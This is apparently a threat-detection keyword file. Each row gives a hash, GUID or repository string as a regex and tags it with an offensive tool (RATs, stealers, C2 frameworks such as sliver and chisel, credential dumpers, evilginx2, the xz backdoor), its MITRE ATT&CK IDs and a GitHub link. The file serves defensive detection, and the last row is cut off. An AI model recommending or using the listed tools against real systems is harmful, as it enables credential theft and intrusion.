"*d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82*",".{0,1000}d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*d3ckx1/Crack-allDBs*",".{0,1000}d3ckx1\/Crack\-allDBs.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*D3CrYP7V41U3(*",".{0,1000}D3CrYP7V41U3\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*D3E7005E-6C5B-47F3-A0B3-028C81C0C1ED*",".{0,1000}D3E7005E\-6C5B\-47F3\-A0B3\-028C81C0C1ED.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330*",".{0,1000}d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8*",".{0,1000}d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*d3lb3@protonmail.com*",".{0,1000}d3lb3\@protonmail\.com.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*D3m0n1z3dShell-main*",".{0,1000}D3m0n1z3dShell\-main.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806*",".{0,1000}d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce*",".{0,1000}d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3","10","10","N/A","N/A","N/A","N/A" "*d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209*",".{0,1000}d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d494a4bc-3867-436a-93ef-737f9e0522eb*",".{0,1000}d494a4bc\-3867\-436a\-93ef\-737f9e0522eb.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556*",".{0,1000}d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c*",".{0,1000}d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932*",".{0,1000}d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0*",".{0,1000}d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a*",".{0,1000}d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391*",".{0,1000}d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638*",".{0,1000}d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45*",".{0,1000}d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D4stiny/ForkPlayground*",".{0,1000}D4stiny\/ForkPlayground.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*D4Vinci*",".{0,1000}D4Vinci.{0,1000}","offensive_tool_keyword","Github Username","Github user: A hacker. high&low-level coder and a lot of things between. 
An extremely curious creature loves to learn. Break things or make things that break things.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23*",".{0,1000}d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7*",".{0,1000}d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77*",".{0,1000}d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a*",".{0,1000}d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985*",".{0,1000}d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452*",".{0,1000}d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8*",".{0,1000}d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc*",".{0,1000}d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285*",".{0,1000}d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*D5C4F5A2-5713-4A0A-A833-F9466AE5A339*",".{0,1000}D5C4F5A2\-5713\-4A0A\-A833\-F9466AE5A339.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58*",".{0,1000}d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794*",".{0,1000}d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68*",".{0,1000}d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9*",".{0,1000}d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of 
common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809*",".{0,1000}d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*d67c342b9ffebd2350cb81d6dbbb35071246fb19*",".{0,1000}d67c342b9ffebd2350cb81d6dbbb35071246fb19.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522*",".{0,1000}d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c*",".{0,1000}d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9*",".{0,1000}d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142*",".{0,1000}d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D7484EBA-6357-4D81-B355-066E28D5DF72*",".{0,1000}D7484EBA\-6357\-4D81\-B355\-066E28D5DF72.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4*",".{0,1000}d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 